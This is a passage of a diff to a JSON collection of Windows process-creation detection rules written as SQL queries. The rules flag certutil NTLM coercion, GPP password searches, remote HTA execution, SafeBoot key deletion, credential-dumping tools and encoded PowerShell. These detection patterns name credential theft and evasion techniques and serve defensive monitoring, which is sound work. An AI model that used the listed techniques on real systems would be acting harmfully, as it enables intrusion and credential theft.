'%\\\\userinit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\')) AND NOT (((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\')))) AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_conhost_uncommon_parent.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", - "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Ie4uinit Lolbin Use From Invalid Path", + "id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "status": "experimental", + "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", + "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1059.005", - "attack.t1059.001", "attack.t1218" ], "falsepositives": [ - "Administrative 
scripts", - "Microsoft SCCM" + "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": 
"proc_creation_win_lolbin_ie4uinit.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", - "author": "Florian Roth (Nextron Systems)", + "title": "Remote Access Tool - NetSupport Execution", + "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" ], - "filename": "proc_creation_win_renamed_adfind.yml" + "filename": 
"proc_creation_win_remote_access_tools_netsupport.yml" }, { - "title": "Suspicious Recursive Takeown", - "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", + "title": "Suspicious X509Enrollment - Process Creation", + "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", "status": "experimental", - "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "description": "Detect use of X509Enrollment", "author": "frack113", + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_x509enrollment.yml" + }, + { + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "status": "experimental", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1218" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\' AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_takeown_recursive_own.yml" + "filename": 
"proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Certificate Exported Via Certutil.EXE", - "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", "status": "test", - "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.g0004", "attack.defense_evasion", - "attack.t1027" + "attack.t1562.001" ], "falsepositives": [ - "There legitimate reasons to export certificates. Investigate the activity to determine if it's benign" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_export_pfx.yml" + "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "title": "Run PowerShell Script from ADS", + "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", "status": "test", - "description": "Look for the encrypted cpassword 
value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", - "author": "frack113", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", - "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - 
"attack.defense_evasion", + "attack.g0030", + "attack.g0050", + "attack.s0081", "attack.execution", - "attack.t1218.005" + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "Start of NT Virtual DOS Machine", - "id": "16905e21-66ee-42fe-b256-1318ada2d770", - "status": "experimental", - "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", - "author": "frack113", + "title": "Sysmon Configuration Update", + "id": "87911521-7098-470b-a459-9a57fc80bdfd", + "status": "test", + "description": "Detects updates to Sysmon's configuration. 
Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use" + "Legitimate administrators might use this command to update Sysmon configuration." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_16bit_application.yml" + "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. 
Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1562.001" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": "proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. 
This could be a sign of data stealing or remote control", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + ], + "filename": "proc_creation_win_hktl_safetykatz.yml" + }, + { + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": 
"proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Launch-VsDevShell.PS1 Proxy Execution", - "id": "45d3a03d-f441-458c-8883-df101a3bb146", + "title": "JSC Convert Javascript To Executable", + "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", "status": "experimental", - "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1216.001" + "attack.t1127" ], "falsepositives": [ - "Legitimate usage of the script by a developer" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" + "filename": "proc_creation_win_lolbin_jsc.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", - "status": "experimental", - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", + "status": "test", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": 
"high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], "falsepositives": [ - "Legitimate scripts that use IEX" + "Other legitimate network providers used and not filtred 
in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": "Execute Code with Pester.bat as Parent", - "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", "status": "experimental", - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1216" + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Legitimate use by administrators" ], - 
"level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pester.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "Powershell Defender Exclusion", - "id": "17769c90-230e-488b-a463-e05c08e9d48f", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "status": "experimental", - "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", "author": 
